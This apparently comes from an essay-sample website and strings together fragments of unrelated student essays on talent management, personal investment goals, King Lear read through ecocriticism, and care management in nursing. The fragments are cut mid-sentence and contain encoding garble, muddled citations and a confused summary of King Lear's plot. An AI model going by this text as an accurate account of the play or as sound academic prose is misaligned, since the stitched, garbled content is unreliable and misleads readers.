criteria for evaluating the effectiveness of the talent management strategy and how the data could be collected† 1. Talent management focuses on diverse programs and cultures in the respective organization. These programs and cultures retain all the available talent in organizations like Southern Company. 2. Additional programs that are part of the strategy for managing talents in organizatio ns include the rotation of duties (Armstrong, 2011). 3. Research into emerging processes of talent management is equally crucial. 4. The managers can alter their respective duty rosters in order to determine the best department for each employee. This will also ensure that employees perfect their diverse talents hence being effective in whatever department (Goldsmith, Marshall, Carter, Louis, & B.P.I, 2009). 5. In addition, the management of talent also includes retaining talent for lengthy periods in order to create loyalty. This is because loyalty increases performance in

Thursday, September 12, 2019

Investment goals Essay Example | Topics and Well Written Essays - 250 words

Investment goals - Essay Example Our goals were similar in that we wanted to save the time value of money. Investing in property was likely to yield more profit than getting the interest on our money stored in banks even if we chose to use our savings accounts. All of my long term goals reflect all the stages of the financial life cycle. The financial life cycle primarily consists of three stages; asset accumulation, conservation and protection, and distribution and gifting (â€Å"Stages of the Financial†). For example, I ultimately want to have my own house, and want to save money for the education of my children. These goals coincide with the asset accumulation stage of the financial life cycle. Likewise, I want to maintain such assets through which I can generate my desired income when I am retired. This is achieved in the conservation and protection stage of the financial life cycle. In the same way, I want to have my property distributed among my children as per my wish when I am dead. This is accomplish ed in the distribution and gifting stage of the financial life

Wednesday, September 11, 2019

Green in Shakespeares Tragedy of King Lear Essay

Green in Shakespeares Tragedy of King Lear - Essay Example William Shakespeare, a known English playwright, and poet are regarded widely as the greatest writer in the language of English and the pre-eminent world’s dramatist. Translation of his major plays has been done to almost all living language and more often performed than other playwrights. In his book, The Tragedy of King Lear, many aspects presage the green literature. The work of Shakespeare illuminates more about human nature that is more instructive for a green environment. With respect to the theory of Green literature, ecocriticism involves the study of the relationship between the environment and the research. The book is all about the British elderly king who decides to give out his power and realm to one of his daughters. Even though his preferred choice is the one who loves him most, the other two disguises him and acquire the wealth. The two later turns against him but through the friends of the other daughter, he manages to ascertain the reality. In relevance to nature, therefore, a habitat consists of different organisms’ co-existing together for mutual benefits. An organism can acquire help from the other community, for instance in support. Plants with tendrils, for example, get support from big trees to acquire sunlight. This paper, therefore, analyses the review of the play, The Tragedy of King Lear with regards to the theory of Green Literature, how ecocriticism relates both literature and the environment. The theory of green literature provides the vocabulary towards environmental ethics as well as an attitude in the story of King Lear. This offered a movement beyond symbolism and thematic which were widely characterized by the critical work of Shakespeare in relation to the environment representation.  

Tuesday, September 10, 2019

The importance of effective care management practices in the nursing Essay

The importance of effective care management practices in the nursing - Essay Example The researcher states that effective care management is essential for the betterment of nursing management and also for the betterment of the overall society. A patient gets satisfied if the nurse delivers him an effecting and caring service and also the disease of the patient gets cured with ease. Nurses are required to implement effective care management practices with the help of team work and collaboration with others (doctors and patients). Nursing can be described as a service profession where nurses play two basic roles: care provider and care manager. As a care provider the main role of a nurse is to provide greater care to her patients who are suffering from diseases or health-related problems. As a care manager the main role of a nurse is to provide her patient a comfortable environment and practices to get rid of all the pains and sufferings. Effective care management is an essential requirement for the purpose of providing effective nursing services to patients. The notio n of care management is particularly important for nurses because they are the most important care provider to the patients. It is also because they are the care manager of the most important service sector in society, the health care sector. Among all care management practices the nursing care management is the most important care management practice in health care sector of society. Care management practices have been recognised not as professions which require professional status; rather care management has been identified as one of the most important practices in service sectors of the society.... It is also because they are the care manager of the most important service sector in society, the health care sector. Among all care management practices the nursing care management is the most important care management practice in health care sector of society. Care management practices have been recognised not as professions which require professional status; rather care management has been identified as one of the most important practices in service sectors of the society (Cress, 2010, p.400). Care management is described not as a necessity for the purpose of improving health conditions of a person, but it is looked as a critical strategy element of health plans of the society. Effective management of care and chronic health conditions are absolute necessities in modern society; not only from society’s point-of-view, but also from economic point-of-view. From society’s perspective greater health care management leads to greater effective and improves health condition s of the society. From the perspective of economics, effective health care management means greater savings in terms of human resource through effective health conditions of societies (Berger, 1999, p.199). The notion of care management can be used as one of the most important concepts in health care sector, nursing management. Nursing management can be described as a process where nursing resources are coordinated and integrated to deliver an organised high-client care to different individuals and groups or communities. This nursing management requires collaborations and team works among different agents who are involved in the heal care service sector of the society (Nagelkerk, 2006, pp.9-10). The notion of care